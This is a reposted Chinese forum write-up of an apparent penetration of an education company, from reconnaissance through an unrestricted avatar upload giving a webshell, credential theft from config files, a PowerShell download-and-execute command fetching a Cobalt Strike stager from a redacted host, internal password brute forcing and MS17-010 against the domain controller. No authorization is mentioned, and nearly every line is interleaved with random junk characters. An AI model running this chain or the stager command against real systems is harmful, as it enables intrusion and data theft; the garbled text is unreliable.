# A& ~! N' h" i' l/ K 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
, l; T6 a; g) m
+ B& ^/ N1 ]& Q* l
, h( w% N4 u- N" [
6 Y, n3 C* x; q5 h $ ?2 X6 b d! m/ N1 ^5 ]
) c0 W" y! J, |% s* Y+ _
正文
. m x- I" H9 m: A6 A7 ]+ f- k
2 o+ G4 N- Y' S$ C3 M$ J1 T% j) N2 ]' b% f, A
( _5 o! U2 b& t- Y
* g: H. g. Y" s+ P2 @+ t8 s2 o7 s1 E v. a7 t4 P$ O$ I: P
目标:www.xxxx.com(一家教育机构) ; C: w, }- |% V# C2 D7 z- x
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
?6 l' D7 k0 T! ] T0 L8 R0 |$ R7 h7 [
& L) W' c; Z8 P9 e& x1 b. ?/ u
3 d1 u; x* e% t' B: H
. q( C0 q* j v, _
[# E& n/ e9 f 进行了简单的信息搜集
& }( S+ ?- R- R" _
% O7 O) `6 o& O* S( o8 n h+ S$ l8 ~0 L
' b* D' o# a3 U9 I. V' J, M" D
' b) Z5 j9 a" D! W% V1 J( m! x 子域名搜集
U7 |2 O9 z* e3 k- J( t7 n) d+ X* k) t & X F1 j) W8 C2 @
( E3 O& D0 ~/ W: T. C& f
$ e* p/ V0 \" [! j8 t
: J) e2 `- Q6 P# k! ^7 L5 c' E
* {0 o9 S. J9 T- {8 {- s2 }# `$ { fofa找资产
! W- T$ E* V/ O9 X* Y7 [ B$ o* I4 U) c! p
7 W1 S; U2 Q1 U' X$ W& p% c1 x
4 e- w/ N: M8 n/ O6 W2 ?3 P
$ o' K3 ~6 m( |8 A: h9 c) H) R$ l/ n 4 A1 \5 G9 b0 C# G' {. ]4 g
~- J4 q7 T# A) N; @8 g
: Z% O1 S- f, L% T+ f/ u
一共七个资产。去重之后只有两个。 , T# \* s. \5 E Z* Z/ H* Z5 B2 h
: \0 d$ W* Z z! G6 d3 R* |( E
* C y! K. A/ Q, w* L" u
+ \4 ^+ |* C, ~5 p; y$ g, H4 F$ W$ r# `5 y
目录探测" v4 ^2 F# \9 n; N4 u+ F2 o- |. j
, r% m# {& @4 I
: n/ D4 y# G7 z) D k ^' h% l4 Y! h$ t
$ u+ T, [+ A9 c$ y9 `6 v! S; X4 Y0 [% [8 g
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 q7 J& S" d5 b% I3 ]
# S2 l9 [! k/ y
( h1 h+ k+ G7 x/ g: [5 ^3 z ( z) y; O$ x* H* j8 K/ x" @
" h T( @& Y+ A6 g4 K7 R 我又尝试了通过修改返回包来绕过登录界面' h/ f w% ]+ b
3 i$ k6 o* ^5 Q% }- b
! R. W8 [+ M0 Q: N, J; X
9 W) Y" D- P @( E8 Q" ` - a. z+ k* ~. M
3 y/ n( }; G u8 P$ L4 A 还是不行,尝试注入无果, o! @: ~8 T5 L) L
+ i6 D* ^+ { t5 y% D7 i% x3 K" C- Z' A+ E% l! X
+ g, j4 ~* Y. O8 D2 g+ e
. U; ?) l6 A) V# A. O. d- {; l) ]$ f7 B' z' k6 A. q9 ^* b
不过我目录探测出了一处Spring信息泄露 }. c! \: M9 ]/ w9 e
6 d3 Z. Z" q9 t9 L- t
4 R/ | t5 Z' U4 W% S, `; I2 b" z
& @( |0 p C0 s- g7 Q& i/ V. q" b7 ^0 w* f. `% n$ d
$ _+ E. F& [- P! S# N* F0 i ; L5 Z: g2 |- I8 S# Q) Q+ }7 U
5 @6 y# W: g7 k# f 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录5 `9 ?; D0 |# a! c5 n. l
; D( \8 l& a7 p: Z* |: i1 H9 m Q' d, ~6 J
6 o$ V M) h/ B9 {7 C- @
' W a1 P3 |4 e7 P) l/ u% r: R
( `7 o! ~3 y. e5 A R 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
4 [2 u. k: O" M1 f* Q" l0 b: g
: H1 c# S) y# H8 Y3 t# r) w: [. D" s4 L1 L; j" E- K
; X2 O2 a' u+ ~ : d$ A' r: c" N0 W. r
* a, @ K9 q9 X/ a8 V
获取有些师傅到这一步就手机抓包电脑测了。
! Z2 ?8 L: v e # Y+ a8 b" h- y0 w2 q* \6 }
) ~0 R7 L8 d4 V, p, e" j- s
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
; R2 i$ M7 ~0 Z9 V5 ~# @ ; {' O; c2 e5 x; X( ~# H! X5 T
) q. D7 M: w6 K" Q6 F) Z 其中在一个公众号发现了小程序,可以进行注册。, |, f& T+ S/ S8 \3 \2 V) o
% h, [+ K+ [' L2 X& L
; i, e$ P8 |' X3 H$ v' Q! z 看到了头像上传,尝试上传获取WebShell4 ^8 j5 ~( `& D. S% e# Z
9 O$ m* `+ M+ q& p6 Q
, ?% @6 n1 W4 B. D! M, B# i - C$ i$ m V9 l" m* Y' b3 ?
5 t( C L, b' O" Y& Q' J$ O3 B" k. L8 ] v+ I9 r- S# K& `
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问* m2 N5 t4 x/ }& f
7 E9 a4 V4 T8 q7 i8 B- n
+ f* g' G8 ^. K% w* _0 G8 P* s# l 7 h- D) R w2 o0 i3 [1 O
+ \9 T/ a; U# s4 N' m* |, N( H( r4 v5 x, s1 E
然后上了大马% Q+ p1 X5 J. @& ?: R
; w2 ~. C4 e# P$ r: y8 ?
- M# s5 A5 l' x' ^
n3 d' W+ @ G
1 t6 X* o p( U0 _) L
2 l! L9 L; ~2 t- q 6 t# y: j4 j0 l+ l5 R* I
; K, o- j: T* c1 V6 H/ R0 c4 J6 c: d( ^7 P
通过翻找文件发现数据库账号密码
! h3 q, H, T) l7 X+ @, J4 k: a % O8 v6 }2 M3 h6 @2 D( }" i
1 C4 s _8 b7 B2 ^ " Q1 P/ ~" a: M/ V
# _5 M( i( w0 H- E
; ^. P. |+ E" b
--内网渗透
0 B& Z: y; @# d2 ]: C2 l" C; U 9 Z5 X& h4 {" A5 A* Z
0 ?+ S7 r! j/ U: I7 x
直接通过powershell执行 cs上线
3 E5 B9 h N8 x: E " E4 q0 b( i3 B6 q0 @" b8 ]1 ?
( l0 Z' z' I0 s; @
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"8 ~* v/ ^" O q+ i
' w' s) a' s: t/ a B( D; J
/ h; K6 G5 p$ o- H3 r# n. o
1 s/ E$ M" y: Q" U; ?; Y- k( p, T) q
! j' @5 z" B" R8 }, J a9 Z5 j: W! s& k$ n: p7 k. j
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破3 D4 z4 v" q$ |$ l% J& ~1 `' t+ a
, \- N4 o4 O7 H0 i3 g
/ m' b4 ^$ Z h" \' u
6 m8 Z3 c: y4 H6 A" I $ c! B- k# g. y2 I
: H( x2 \2 |" S, u
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
2 b9 ]* c+ D \8 e. t* ] " p' n/ A3 I/ t
: k% W4 @* u( K( N& i
4 W2 T" H) N( G, {4 x" e6 }. Z2 q
) v6 e3 e, c" Y* s
5 H6 {6 z( n! U* `- A ( a K" u) b# M. a! z* j( i
8 L. d. i A1 v2 V2 n
5 e* C, x- d$ o; [ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# R: b. @* z q$ Y
4 @: b) G; D$ n% f: @7 D
1 M( H+ S' u$ w7 n: j . I+ L9 R5 Q% h. ]; B
5 D" Q' w7 s4 s8 x% U
& F* h" H( Z# z# r6 ~
$ v! T h+ ?$ ?; E
/ G! L5 K( h6 i S- V4 [5 x9 Q
4 R& X# e- s: V , x( R# f0 ^1 B9 ^: ~6 P' H' V
0 ^) ]; A, v, h+ B# @/ H3 t
# D/ ~2 o3 j1 s9 U6 H2 f
0 z* i, L5 p# c
3 C7 v8 m0 r' R5 @4 M# a: k. j. m T! |# B& n7 P4 m2 x
C& I: A* ?7 r' C( M7 J
小结
3 o9 T) X9 n6 o: I! c& _# J* I! a
% X7 P! _ J+ ]% Y! F2 o7 n( ]
, ^. _$ h* f1 k, w! j7 F 6 K, @* E, k& |/ d
& S5 a7 Z7 |; ]7 v7 r3 n
& G% F2 g, v( A5 m { 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!. K: C5 [9 X! Z& I' R
: W2 g% T, C. u$ R7 d0 V. M% \$ E' h# d2 _
2 b# t# f, y0 O* P
3 k, E, Z) U9 j$ h) ~5 ^) o
2 V$ v: b1 m1 p- ~5 E7 J -
, y- c( v5 H" r0 ]& \# r- O' @ Y- t
. i1 k y& M- c o8 ?
1 {! V/ q) b$ N" n) {+ A4 [/ s
- - Z+ D* u: v" a+ \, C; m
7 _3 O. ^3 d/ I) P* i, Q
) N9 O+ L* [) e" E9 v) A
- g; M) p4 Z# K* ]
! I1 y% i! x7 D( s
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html s" \( _( Z+ _* n5 ?: Z: d
. {6 p. l- m3 B* g/ {9 }# ^% w
) B3 z$ R9 C( t- _ |